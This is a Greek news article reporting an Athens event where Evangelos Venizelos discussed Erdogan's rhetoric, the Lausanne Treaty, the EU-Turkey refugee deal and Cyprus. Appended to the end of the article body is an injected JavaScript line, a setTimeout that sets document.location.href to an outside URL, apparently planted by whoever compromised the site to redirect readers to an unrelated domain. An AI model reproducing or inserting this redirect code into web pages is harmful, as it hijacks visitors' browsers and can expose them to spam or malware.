Ευ. Βενιζέλος για δηλώσεις Ερντογάν: Να αντιμετωπίσουμε την τουρκική ρητορική

0
2

 

Η δεξαμενή σκέψης e-Kύκλος υπό τον Ευάγγελο Βενιζέλο διοργάνωσε εκδήλωση με θέμα «Η Ελλάδα στον κόσμο: Nέες προκλήσεις για την ελληνική εξωτερική πολιτική και πολιτική ασφάλειας», με αιχμή τις επιθετικές δηλώσεις του Ταγίπ Eρντογάν και Τούρκων αξιωματούχων.

Σχολιάζοντας την προκλητική ρητορική του Ταγίπ Ερντογάν, ο Ευάγγελος Βενιζέλος επεσήμανε ότι συνιστά προς το εσωτερικό της γείτονος χώρας μια νέα αφήγηση για την τουρκική ταυτότητα, όπως επίσης και μια νέα οπτική προς το εξωτερικό για τον ρόλο της Τουρκίας.

«Αυτό σημαίνει στην ουσία η αμφισβήτηση της Συνθήκης της Λωζάννης» είπε ο κ. Βενιζέλος.

«Πρωτίστως ενδιαφέρεται για το Χαλέπι και τη Μοσούλη και δευτερογενώς για το Αιγαίο».

Στο ίδιο πλαίσιο τόνισε ότι η Ελλάδα πρέπει να είναι πολύ προσεκτική για να μην καταρρεύσει η συμφωνία Ευρώπης-Τουρκίας για το προσφυγικό, και υποστήριξε πως οι ΗΠΑ και η ΕΕ θα πρέπει να κατανοήσουν ότι το προσφυγικό ζήτημα δεν θα αντιμετωπισθεί αν δεν λυθεί το πρόβλημα των συρράξεων στη Συρία.

Για το Κυπριακό υπογράμμισε ότι θα πρέπει η εθνική γραμμή να αφορά στην υποστήριξη της συνέχειας της Κυπριακής Δημοκρατίας, στην κατοχύυρωση του ρόλου του Προέδρου της που είναι σημαντικός, και στην ζήτημα των εγγυήσεων της ανεξαρτησίας της.

Η εκδήλωση πραγματοποιήθηκε σε κεντρικό ξενοδοχείο της Αθήνας, παρουσία πολιτικών, διπλωματών και ακαδημαϊκών. Μεταξύ άλλων, στην εκδήλωση παραβρέθηκαν, ο πρώην πρωθυπουργός Παναγιώτης Πικραμένος, ο Παρασκευάς Αυγερινός, ο Γιώργος Φλωρίδης, ο Παναγιώτης Ιωακειμίδης, ο Λεωνίδας Γρηγοράκος κ.ά.. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here